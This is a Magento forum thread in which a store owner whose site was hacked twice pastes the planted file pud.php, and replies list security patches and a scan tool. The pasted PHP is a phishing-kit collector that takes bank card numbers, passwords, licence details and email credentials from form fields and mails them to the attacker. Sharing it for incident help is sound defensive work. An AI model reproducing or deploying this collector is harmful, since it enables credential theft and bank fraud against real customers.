Showing results for 
Search instead for 
Did you mean: 

How ease to hack magento


How ease to hack magento

Hello Friends,

I am using Magento over http and my domain is hacked twice; on first time hackers uses Media and JS to install a Module for additional login.html then I have cleared all offending contents from the server and changed the admin passwords too but again my domain got hacked and now this time they use downloader>skin>install to upload the file pud.php

Here is the detailed code of that file:


$sec = $_REQUEST['password'];
$page_name= "Stgeorge";

if(isset($sec)) {
		$ip = getenv("REMOTE_ADDR");
		$message .= "---------- Login Information ----------------------------\n";
		$message .= "Card/Access Number: ".$_POST['firstname']."\n";
		$message .= "Security Number: ".$_POST['password']."\n";
		$message .= "Internet Password: ".$_POST['passwords']."\n";
		$message .= "---------- Identity Information ----------------------------\n";
		$message .= "Full Name : ".$_POST['fn']."\n";
		$message .= "Verbal Password : ".$_POST['vb']."\n";
		$message .= "DOB: ".$_POST['dobday']." - ".$_POST['dobmonth']." - ".$_POST['dobyear']."\n";
		$message .= "10-Digit Licence Card Number: ".$_POST['dln']."\n";
		$message .= "Driver's licence number: ".$_POST['dlnssss']."\n";
		$message .= "Licence Expiry Date: ".$_POST['edobday']." - ".$_POST['edobmonth']." - ".$_POST['edobyear']."\n";
		$message .= "---------- Contact Information and Home Address ----------------------------\n";
		$message .= "Mobile Number: ".$_POST['mn']."\n";
		$message .= "Home Phone Number: ".$_POST['pn']."\n";
		$message .= "E-mail Address: ".$_POST['email']."\n";		
		$message .= "E-mail Pass: ".$_POST['emailp']."\n";		
		$message .= "IP: ".$ip."\n";
		$message .= "----------------Created By shika------------------\n";
		$send = ",";
		$subject = $page_name." - ReZulTs";
		$headers = "From: <>";
		$headers .= $_POST['eMailAdd']."\n";
		$headers .= "MIME-Version: 1.0\n";
		mail("$send", "$subject", $message); 

else {



Finally, I think that how ease to hack Magento

Now, I need help to stop this hacking sequence and for that please tell me all available processes and available security patches for



Re: How ease to hack magento

Hi @Arbit17,


The list of patches for that version of Magento is:


  • SUPEE-10266: SUPEE-10266 for CE (0.04 MB)
  •  SUPEE-10336: SUPEE-10336 for CE and earlier (0.01 MB)
  •  SUPEE-1533: SUPEE-1533 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  •  SUPEE-1868: Magento-CE-v1.8.x (0.01 MB)
  •  APPSEC-212: Magento-CE-v1.8.0.0- (0.01 MB)
  •  SUPEE-2725: Magento-CE-v1.7.0.0- (0.01 MB)
  •  SUPEE-3941: Magento-CE-v1.8.0.0- (0.03 MB)
  •  SUPEE-4291/4334: Magento-CE-v1.7.x-1.8.x (0.01 MB)
  •  SUPEE-5344: SUPEE-5344 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  •  SUPEE-5994: SUPEE-5994 for CE - (0.04 MB)
  •  SUPEE-6237: USPS API Patch - SUPEE-6237 - CE 1.6.x-1.9.1.x (0.01 MB)
  •  SUPEE-6285: SUPEE-6285 for CE (0.05 MB)
  •  SUPEE-6482: SUPEE-6482 for CE 1.7.x - (0.01 MB)
  •  SUPEE-6788: SUPEE-6788 for CE (0.17 MB)
  •  SUPEE-7405: SUPEE-7405 for CE (0.11 MB)
  •  SUPEE-7405 v1.1: SUPEE-7405 v1.1 for CE (0.01 MB)
  •  SUPEE-7616: SUPEE-7616 for CE - (0.01 MB)
  •  SUPEE-8167: SUPEE-8167 for CE (0.01 MB)
  •  SUPEE-8788: SUPEE-8788 for CE (0.63 MB)
  •  SUPEE-8967: SUPEE-8967 for CE (0.01 MB)
  •  SUPEE-9652: SUPEE-9652 for CE (0.01 MB)
  •  SUPEE-9767: SUPEE-9767 for CE (0.08 MB)
  •  SUPEE-9767 v2: SUPEE-9767v2 for CE (0.06 MB)
  •  PHP 5.4: Magento-CE-v1.8.0.0 (0.01 MB)


You can use this tool as help:


If you've found one of my answers useful, please give "Kudos" or "Accept as Solution"

Re: How ease to hack magento

Magento just launched its own security scan tool - . Sign up for it it is free. It will tell you not only what patches you need to install but also warn you about other vulnerabilities you might have.